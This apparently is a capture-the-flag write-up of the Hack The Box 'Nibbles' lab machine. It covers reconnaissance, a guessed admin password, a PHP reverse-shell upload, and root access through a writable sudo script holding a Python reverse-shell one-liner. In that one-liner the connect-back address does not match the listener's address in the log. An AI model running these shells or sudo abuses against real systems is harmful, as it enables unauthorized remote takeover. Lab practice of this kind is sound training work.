# Nibbles ## Reconnaissance ``` # Nmap 7.91 scan initiated Sun Mar 14 00:25:31 2021 as: nmap -sC -sV -p22,80 -oN nibbles.nmap 10.10.10.75 Nmap scan report for 10.10.10.75 Host is up (0.10s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Mar 14 00:25:42 2021 -- 1 IP address (1 host up) scanned in 11.03 seconds ``` After running the nmap scan, go to the web browser and visit the server and review the page source. ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnMEIZfD0agUIGxtdc%2Fimage.png?alt=media\&token=66957b72-a375-4297-8bf5-30a257e1e657) Next step would be to visit the webpage directory as specified. ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnMRzEsWoy5zOvgdN3%2Fimage.png?alt=media\&token=8fc1ba02-d1eb-4e81-8637-4c07ed4692c7) ## Found Login ![Found login page](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnMhElmKXrP9FGW4wT%2Fimage.png?alt=media\&token=4da29121-c9c5-4369-acf9-880bedbc9f59) After trying default credentials it did not work, it also has a lockout mechanism, which means you can get banned. Nothing much here, the password is nibbles and must go based on what you think a system administrator with poor practice would use. We'll proceed to finding a username with GoBuster. ## Running GoBuster Scan ``` └─$ gobuster dir --url http://10.10.10.75/nibbleblog/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.75/nibbleblog/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== 2021/03/14 18:23:03 Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 200) [Size: 2987] /sitemap.php (Status: 200) [Size: 402] /content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/] /themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] /feed.php (Status: 200) [Size: 302] /admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/] /admin.php (Status: 200) [Size: 1401] /plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/] /install.php (Status: 200) [Size: 78] /update.php (Status: 200) [Size: 1622] /README (Status: 200) [Size: 4628] /languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/] ``` ## Found Username and Version These were found while searching the GoBuster directories ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnO8esovV80ndy71Qo%2Fimage.png?alt=media\&token=a3ba3ed6-2d87-4064-8575-153b256dae5f) ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnOHtt8f0BTYll5yEk%2Fimage.png?alt=media\&token=ba7bba8b-2cc9-4311-8026-e0747e210694) ## Found Exploit ``` ─$ searchsploit nibble ------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------- --------------------------------- Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb ------------------------------------------------------------------------------------- --------------------------------- ``` More information on this exploit can be found here. {% embed url="" %} The exploit is straight forward, gain credentials, upload php reverse shell and execute. ## Uploading Shell Login to through the admin panel, the passowrd is nibbles as guessed and upload one of the following shells with your kali IP ``` re/laudanum/wordpress/templates/php-reverse-shell.php /usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php /usr/share/webshells/php/php-reverse-shell.php ``` They should all suffice, so pick your poison. ![Uploading Shell in My Images](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnPdMAuQP-NzMl9kFl%2Fimage.png?alt=media\&token=f1765117-5390-4d47-a018-012a90d03aa9) Set up your listener and visit the following link. {% embed url="" %} ``` ┌──(kali㉿kali)-[~/HTB/Nibbles] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 52458 Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 18:46:16 up 19 min, 0 users, load average: 0.00, 0.02, 0.02 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) /bin/sh: 0: can't access tty; job control turned off $ whoami nibbler ``` Once your connection is established, check if you can create any files that you can run as another user. ``` nibbler@Nibbles:/home/nibbler$ sudo -l sudo: unable to resolve host Nibbles: Connection timed out tching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh ``` Create the following folders and file, along with python reverse code. ``` nibbler@Nibbles:/home/nibbler/personal/stuff$ vi monitor.sh #!/bin/sh python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SO CK_STREAM);s.connect(("10.10.10.75",7777));os.dup2(s.fileno(),0); os.dup2(s.file no(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` Set up your listener and execute the create script as sudo. ``` nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh sudo: unable to resolve host Nibbles: Connection timed out ``` ## Getting ROOT ``` ─$ nc -lvnp 7777 listening on [any] 7777 ... connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 36800 # whoami root # ls bakmonitor.sh monitor.sh test.py # cd /root # ls root.txt ```